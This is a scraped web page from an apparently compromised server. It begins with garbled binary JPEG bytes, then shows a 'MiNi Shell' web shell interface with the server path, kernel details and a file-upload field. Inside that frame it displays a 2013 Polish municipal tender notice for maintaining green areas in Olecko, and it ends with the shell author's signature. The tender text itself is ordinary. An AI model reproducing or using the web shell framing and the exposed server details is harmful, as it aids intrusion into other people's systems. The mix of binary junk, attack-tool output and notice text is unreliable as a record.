JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131104/230847-N-2013.html

<p class="kh_header"><b>Olecko: Utrzymanie urządzonych terenów zieleni miejskiej w Olecku</b><br>
<b>Numer ogłoszenia: 230847 - 2013; data zamieszczenia: 04.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Olecku , Plac Wolności 3, 19-400 Olecko, woj. warmińsko-mazurskie, tel. 087 520 21 68, faks 087 520 25 58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.olecko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie urządzonych terenów zieleni miejskiej w Olecku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest utrzymanie  zieleni miejskiej w Olecku w latach 2014-2015 na następujących ternach o całkowitej powierzchni 23,435 ha wraz z ciągami komunikacyjnymi biegnącymi przez te tereny:
a)	zieleń w obrębie Placu Wolności o powierzchni 3,0 ha w tym park, plac zabaw, tereny zielone wokół utwardzonej części placu, zieleń w pasach drogowych,
b)	Park Sportu i Rekreacji o pow. 9,00 ha,
c)	park dworcowy o pow. 1,17 ha,
d)	teren zieleni wokół Urzędu Miejskiego o pow. 0,18 ha,
e)	teren zieleni przy ul. Letniej i Al. 450-lecia Olecka (łącznie z placem zabaw i skate parkiem) o pow. 1,8 ha,
f)	cmentarz ewangelicki o powierzchni 3,9 ha,
g)	skwer przy ul. Ludowej 1a o pow. 0,38 ha,
h)	skarpa przy ul. 11 Listopada o pow. 0,02 ha,
i)	skwer przy ul. Tunelowa - Kolejowa  o pow. 0,20 ha,
j)	skwer przy ul. Kolejowa - Wiśniowa o pow. 0,30 ha,
k)	skwer przy ul. Młynowej o pow. 0,04 ha,
l)	skwer przy ul. Kościuszki - Targowa o pow. 0,13 ha,
m)	tereny zielone na Os. Siejnik (stawek i przejście) o powierzchni ok. 2,00  ha,
n)	rabaty przy ul. Kolejowej i Placu Wolności o pow. 0,015 ha,
o)	urządzone ciągi zieleni wzdłuż ulic: 11 Listopada, Kościuszki, Kolejowej, Grunwaldzkiej, Ludowej, Nocznickiego o łącznej pow. 0,13 ha,
p)	tereny zieleni urządzonej na skarpach nad jeziorem tzw. szyjka o pow. 1,00 ha,
q)	ronda przy ul. Gołdapskiej, ul. Wojska Polskiego i 11 Listopada, Alei Zwycięstwa,   i ul. Kościuszki o łącznej pow. 0,17 ha.
2.Wykonawca zobowiązany jest do utrzymywania terenów wymienionych                  w punkcie 1. zgodnie z następującymi standardami utrzymania:
I. Standard utrzymania: Tereny o powierzchni 5,03 ha (zieleń w obrębie Placu Wolności- 3,00 ha, park dworcowy - 1,17 ha, skwer przy ul. Kolejowa- Wiśniowa o pow.  0,30 ha, skwer przy ul. Ludowej- 0,38 ha oraz teren wokół Urzędu Miejskiego-0,18 ha) należy utrzymywać w I standardzie tzn., że poza czynnościami określonymi dla II standardu należy:	
1. Dwukrotne w ciągu roku przeprowadzać napowietrzanie trawników;
2. Prowadzić pielenie rabat i krzewów, w zależności od potrzeb, nie rzadziej niż 2 razy w miesiącu;
3. Dosiewać trawę  i na bieżąco uzupełniać ubytki trawników;
4. Wywozić trawę po każdym koszeniu;
5. Zabezpieczać krzewy na zimę;
6. Nawożenie roślin wg różnorodności i potrzeb;
7. Uzupełnianie kory w skupiskach roślin (materiał zakupiony przez Wykonawcę).

II. Zakres prac w drugim standardzie utrzymania dotyczy całej                 powierzchni terenów zielonych i obejmuje:
1. Koszenie trawników wg potrzeb (wysokość murawy nie może przekraczać 10 cm) załadunek i wywóz skoszonej trawy;
2. Cięcie krzewów pielęgnacyjne i kształtujące- w zależności od gatunku i wieku,    przycinanie pędów mające na celu zagęszczenie krzewów i nadanie odpowiedniej formy;
3. Cięcie odmładzające żywopłotów o pędach zdrewniałych- przycięcie pędów zdrewniałych mające na celu zagęszczenie krzewów, nadanie nowej odpowiedniej formy, po wykonaniu pracy należy natychmiast usunąć ścięte pędy;
4.  Cięcie żywopłotu po pędach niezdrewniałych - cięcie obejmuje wszystkie płaszczyzny 
          żywopłotu po linii odrostów pędów niezdrewniałych;
5. Odchwaszczanie skupisk krzewów i żywopłotów - spulchnienie gleby oraz usuwanie ręcznie chwastów i samosiewów z systemem korzeniowym oraz odcięcie brzegów trawnika;
     6.  Wykładanie korą skupisk krzewów warstwą  6-8 cm;
     7.   Podlewanie drzew, krzewów, roślin  i trawników w zależności od potrzeb;
     8.  Wygrabianie liści z trawników i skupisk krzewów - wygrabianie liści wraz z innymi   
          zanieczyszczeniami, sukcesywnie w miarę opadania, z ich wywozem;
     9. Usuwanie suchych drzew i konarów;
     10. Sezonowe obsadzanie  kwiatami rabat i  gazonów (rośliny zakupione przez
           Wykonawcę po uzgodnieniu z Zamawiającym gatunków za kwotę 10.000 zł rocznie):
- przygotowanie kwietników do obsadzenia (przekopanie gleby z wysiewem i   przykryciem nawozów, wyrównanie),
-  sadzenie roślin sezonowych  (wyznaczenie miejsc sadzenia, posadzenie i podlanie),
- pielenie wraz z usuwaniem przekwitłych kwiatostanów ( spulchnienie gleby oraz usuwanie ręczne chwastów z systemem korzeniowym oraz odcięcie brzegów trawnika),
- podlewanie,
- likwidacja nasadzeń na koniec sezonu wraz z wyrównaniem powierzchni (usuwanie materiału roślinnego oraz innych zanieczyszczeń z wywozem, wyrównanie powierzchni gleby);
     11.  Zwalczanie chorób i szkodników;
     12. Usuwanie zanieczyszczeń z terenów zieleni oraz ich koszenie nie powinno     powodować zanieczyszczeń przyległych placów i chodników;
     13. Pielęgnacja nasadzeń na terenach zieleni winna być prowadzona w sposób nie  powodujący pogorszenia stanu roślinności (ubytki w nasadzeniach spowodowane niewłaściwą pielęgnacją Wykonawca uzupełni we własnym  zakresie);
14. Uzupełnienie roślinności wypadłej niezależnie od Wykonawcy leży w zakresie  Wykonawcy w ilości do 50 sztuk roślin (rośliny dostarczone przez  Zamawiającego);
15.	  Usuwanie śniegu z roślin iglastych (ręczne obsypywanie śniegu);
16.	  Oczyszczanie pozimowe trawników i rabat z krzewami z liści i innych zanieczyszczeń;
17.	  Oczyszczanie z wszelkich zanieczyszczeń terenów placów zabaw z oczyszczaniem z nieczystości elementów zabawowych.
18.	 Sprzątanie ciągów pieszych biegnących przez tereny zieleni polegające na bieżącym usuwaniu zanieczyszczeń (piasku, liści, śmieci itp.) a zimą na odśnieżaniu i likwidowaniu śliskości.
19.	 Zasilanie nawozami krzewów i trawników w miarę potrzeb;
20.	  Śmieci pochodzące ze sprzątania oraz odpady roślinne powstałe podczas prac Wykonawca powinien pozbywać się zgodnie z obowiązującymi przepisami.

III. Utrzymanie cmentarza ewangelickiego:
1.	Pielęgnacja i przecinka drzew i krzewów;
2.	Usuwanie suchych drzew i konarów oraz suchych i chorych pędów krzewów;
3.	 Formowanie żywopłotów;
4.	 Usuwanie chwastów;
5.	Zwalczanie chorób i szkodników;
6.	Koszenie trawników;
7.	Zgrabianie i usuwanie liści i innych zanieczyszczeń z terenów zieleni;
8.	Usuwanie zanieczyszczeń  z terenów zieleni oraz ich koszenie nie powinno powodować zanieczyszczeń przyległych placów i chodników;
9.	Prowadzenie sukcesywnej wycinki odrostów i samosiewów na kwaterach;
10.	Wygrabywanie liści z ciągów komunikacyjnych, kwaterach urządzonych oraz terenach na  których nie ma nagrobków;
11.	 Zanieczyszczenia typu butelki, papiery, puszki usuwać na bieżąco;
12.	 Przy prowadzeniu prac nie należy niszczyć powojów porastających nagrobki i drzewa;
13.	Śmieci pochodzące ze sprzątania należy pozbywać się zgodnie z obowiązującymi przepisami..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 i 7 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wniesienia wadium  w wysokości 10 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o zamówienie publiczne mogą brać udział Wykonawcy, którzy:
1. Spełniają wymagania określone w art. 22 ust.1 oraz nie podlegają wykluczeniu z postępowania na podstawie art.24 ustawy Prawo zamówień publicznych.
2. Posiadają zezwolenia i uprawnienia do prowadzenia działalności, zgodnie z obowiązującymi przepisami oraz dysponują odpowiednią ilością osób oraz sprzętu do wykonania zamówienia.
3. Posiadają przynajmniej 3- letnie doświadczenie w zakresie pielęgnacji zieleni obszaru  min 20 ha - rocznie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych prac z zakresu  pielęgnacji zieleni obszaru min. 20 ha rocznie                    z okresu ostatnich 3 lat - zgodnie ze wzorem stanowiącym załącznik nr IV do Specyfikacji Istotnych Warunków Zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby biorące udział w realizacji zamówienia posiadają (należy wskazać co najmniej jedną osobę)  wykształcenie (lub ukończyły kurs lub szkolenie) w zakresie pielęgnacji zieleni lub pokrewne, wraz z kserokopią dokumentu poświadczającego- zgodnie z wzorem stanowiącym załącznik nr III do Specyfikacji Istotnych Warunków Zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aktualny Wpis do Rejestru Działalności Regulowanej obowiązujący na terenie Gminy Olecko lub umowę z firmą posiadającą taki wpis. Zamawiający dopuszcza również pisemne zaświadczenie lub oświadczenie firmy posiadającej wpis do Rejestru Działalności Regulowanej do podpisania takiej umowy. W takim przypadku Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązuje się do przedłożenia dokumentu (umowy) najpóźniej w dniu podpisania umowy z Zamawiającym.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się zmiany w treści umowy w formie aneksu dotyczące zmian w zakresie zwiększenia lub zmniejszenia powierzchni terenów zieleni, na których realizowane jest zamówienie.
2. Zmiana stawki VAT stanowi podstawę do zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.olecko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Olecku
Plac Wolności 3
19-400 Olecko
pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2013 godzina 10:00, miejsce: Urząd Miejski w Olecku
Plac Wolności 3
19-400 Olecko
pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com